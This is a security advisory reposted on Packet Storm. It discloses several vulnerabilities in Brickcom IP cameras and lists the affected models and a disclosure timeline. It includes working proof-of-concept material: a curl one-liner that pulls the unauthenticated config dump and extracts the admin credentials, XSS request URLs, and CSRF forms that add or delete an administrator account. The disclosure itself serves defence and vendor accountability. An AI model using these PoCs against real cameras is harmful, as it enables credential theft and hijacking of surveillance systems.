what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Brickcom Network Cameras XSS / CSRF / Insecure Direct Object Reference

Brickcom Network Cameras XSS / CSRF / Insecure Direct Object Reference
Posted Apr 14, 2016
Authored by OrwellLabs | Site orwelllabs.com

Brickcom Network Cameras suffer from insecure direct object reference, hard-coded credentials, information disclosure, cross site request forgery, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure, csrf
SHA-256 | d4263442a7cc41a494d9af50e1ba3231bc2e0bda0bbf7e50965fda5669553dc6

Brickcom Network Cameras XSS / CSRF / Insecure Direct Object Reference

Change Mirror Download
                         _ _ _       _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/


Security Adivisory
2016-04-12
www.orwelllabs.com
twt:@orwelllabs


sm1thw@0rw3lll4bs:~/bb# ./Bruce.S
[+] surveillance is the business model
of the internet - OK!
sm1thw@0rw3lll4bs:~/bb# echo $?
6079




Adivisory Information
=====================
Vendor: Brickcom Corporation
CVE-Number:N/A
Adivisory-URL:
http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html
OLSA-ID: OLSA-2015-12-12
Impact: High (especially because some of these products are used in
critical environments.)
Remote: Yes



p4n0pt1c0n

I. Insecure Direct Object Reference/Authentication Bypass
II. Sensitive information in plaintext
III. Hard-coded Credentials
IV. Cross-site scripting
V. Basic Authentication
VI. Cross-site Request Forgery




Background
----------
Brickcom (calls itself) as a "leading network video manufacturer in the IP
surveillance industry.
Dedicated to providing the best IP surveillance solutions with a solid
foundation for engineering
quality network video equipment with a Research and Development Department
that has been producing
wireless broadband networking equipment for over twenty years."

These products are used as video surveillance system by costumers and
important sectors such as the Thai 4ir F0rce, as can be seen on the
Vendor's web site.

* notes:

- some firmwares affected (item 'affected products' are very recent, having
been launched
a few months ago, and still vulnerable ... so this is an structural/legacy
problem.

- sensitive information presented in this advisory are fake.



I. Insecure Direct Object Reference/Authentication Bypass
---------------------------------------------------------
(+) affected scripts
- configfile.dump
- syslog.dump


Path: Maintenance -> Configuration -> 'Export'

+ configfile.dump

An unauthenticated GET request to the script "configfile.dump", as follows:
http://xxx.xxx.xxx.xxx/configfile.dump?action=get

or like this

http://xxx.xxx.xxx.xxx/configfile.dump.backup
http://xxx.xxx.xxx.xxx/configfile.dump.gz

or just
http://xxx.xxx.xxx.xxx/configfile.dump

returns all camera settings

[..code_snip..]

DeviceBasicInfo.firmwareVersion=v3.0.6.12
DeviceBasicInfo.macAddress=00:00:00:00:00:00
DeviceBasicInfo.sensorID=OV9X11
DeviceBasicInfo.internalName=Brickcom
DeviceBasicInfo.productName=Di-1092AX
DeviceBasicInfo.displayName=CB-1092AX
DeviceBasicInfo.modelNumber=XXX
DeviceBasicInfo.companyName=Brickcom Corporation
DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]
DeviceBasicInfo.companyUrl=www.brickcom.com
DeviceBasicInfo.serialNumber=AXNB02B211111
DeviceBasicInfo.skuType=LIT
DeviceBasicInfo.ledIndicatorMode=1
DeviceBasicInfo.minorFW=1
DeviceBasicInfo.hardwareVersion=
DeviceBasicInfo.PseudoPDseProdNum=P3301
AudioDeviceSetting.muted=0

[..code_snip..]

and all credentials including the administrator account, like this:


UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss <<<--- admin pass
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User <<<--- admin user
UserSetSetting.userList.users1.index=0
UserSetSetting.userList.users1.password=C0mm0mP4ss <<<--- (commom) user
pass
UserSetSetting.userList.users1.privilege=1
UserSetSetting.userList.users1.username=User_name <<<--- (commom)
username
UserSetSetting.userList.users2.index=0
UserSetSetting.userList.users2.password=[..code_snip..]
[snip]
BasicNetworkSetting.pppoe.password= <<<--- ppoe user
BasicNetworkSetting.pppoe.username= <<<--- ppoe pass
UPnPSetting.enabled=1
UPnPSetting.name=CB-102Ap-1ffc3
Brickcom.enabled=1
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username= <<<--- dyndns user
DDNSSetting.dyndns.password= <<<--- dyndns password
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username= <<<--- and here...
DDNSSetting.tzodns.password= <<<--- here....
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username= <<<--- here
DDNSSetting.noipdns.password= <<<--- here
DDNSSetting.noipdns.hostname=
and many others...

- Path: System -> System Log -> 'Save to File'

+ syslog.dump

- Request:
(unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get

- Response:
[..code_snip..]

LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:13:36 2014
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:11:02 2014

[..code_snip..]


Proof of Concept
`````````````````
Online Bash exploit-p0c:
curl -s -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0"
configfile.dump|awk '{ FS="."; } { print $4; }' || echo -e "[-] The target
seems not be vulnerable, Mr. Robot! \n"

IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show a username,
password and privilege level (1:admin), like this:

password=4adm1niS3cr3tP4ss
privilege=1
username=BrickcomADMIN

and a configfile.dump with all credentials, settings, etc. will be recorded
locally.
IF not vulnerable, you'll see the message:

"[-] The target seems not bet vulnerable, Mr. Robot!"


II. sensitive information in plaintext
--------------------------------------
As shown, there are countless cases where credentials and other sensitive
information are store in plaintext.


III. Hard-coded Credentials
---------------------------
All credentials and other sensitive information can be found in html page
user_management_config.html,
Just viewing the html source code:

view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html

<script type="text/javascript">
var Edit_id="";
var userSet_size="5"
var User_index=new Array(10);
var User_username=new Array(10);
var User_password=new Array(10);
var User_privilege=new Array(10);

User_index[0]="1";
User_username[0]="admin"; <<<----
User_password[0]="admin"; <<<----
User_privilege[0]="1";

User_index[1]="2";
User_username[1]="masteruser"; <<<----
User_password[1]="masterP4sss1*"; <<<----
User_privilege[1]="0";


IV. Cross-site scripting
------------------------
(+) Script: /cgi-bin/NotificationTest.cgi
(+) Param: action=


REQUEST: http://xxx.xxx.xxx.xxx/cgi-bin/NotificationTest.cgi?action=[ **
XSS
**]&addressType=&hostname=h0stn4mE&ipAddress=xxx.xxx.xxxx.xxx&ipv6Address=&portNo=&accountName=brickcom&password=brickcom&ShareDIR=


V. Basic Authentication
-----------------------
The response asks the user to enter credentials for Basic HTTP
authentication.
If these are supplied, they will be submitted over clear-text HTTP (in
Base64-encoded form).


V. Cross-site Request Forgery
-----------------------------
# To add an administrative credential: "brickcom:brickcom"

> Privilege levels:
- visor : 0
- admin : 1
- visor remoto : 2


<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="index" value="0" />
<input type="hidden" name="username" value="brickcom" />
<input type="hidden" name="password" value="brickcom" />
<input type="hidden" name="privilege" value="1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


# to remove this credential:

<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="username" value="brickcom" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


affected products
-----------------
(+) various products, including models:

Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12
(release:09/08/2010 14:46)
Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26
(release:01/21/2011 18:31)

Vandal Dome Cameras
-------------------
Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise
(release:2015-10-01_18:46:07)
Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T
(release:2016-03-21_10:08:24)
Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T
(release:2015-06-25_11:18:07)

Bullet Cameras
--------------
Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R
(release:2015-09-08_18:40:11)
Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-16_11:36:46)
Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-15_11:30:46)
Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR
(release:2016-01-18_10:07:03)
Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.17A (release: 2015-07-10_11:36:41)
Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.18.3R (release: 2015-10-15_11:30:46)


Mini Dome Camera
----------------
Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8
(release:2013-08-01)


Cube Camera
-----------
Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release:
09/07/2010 11:45)


Fixed Dome Camera
-----------------
Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R
(release: 2015-08-19_18:47:31)


Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.


Timeline
++++++++
2015-03-20 - Issues discovered
2015-03-30 - attempt to contact Vendor
2015-12-12 - attempt to assign CVE
2016-04-12 - Not easy way to contact vendor, (ON Twitter) the last tweet
was 2011-01-31...
2016-04-14 - Full disclosure


About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in
embedded device & webapp hacking &&
aims to create some intelligence around this vast and confusing picture
that is the Internet of things.


-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close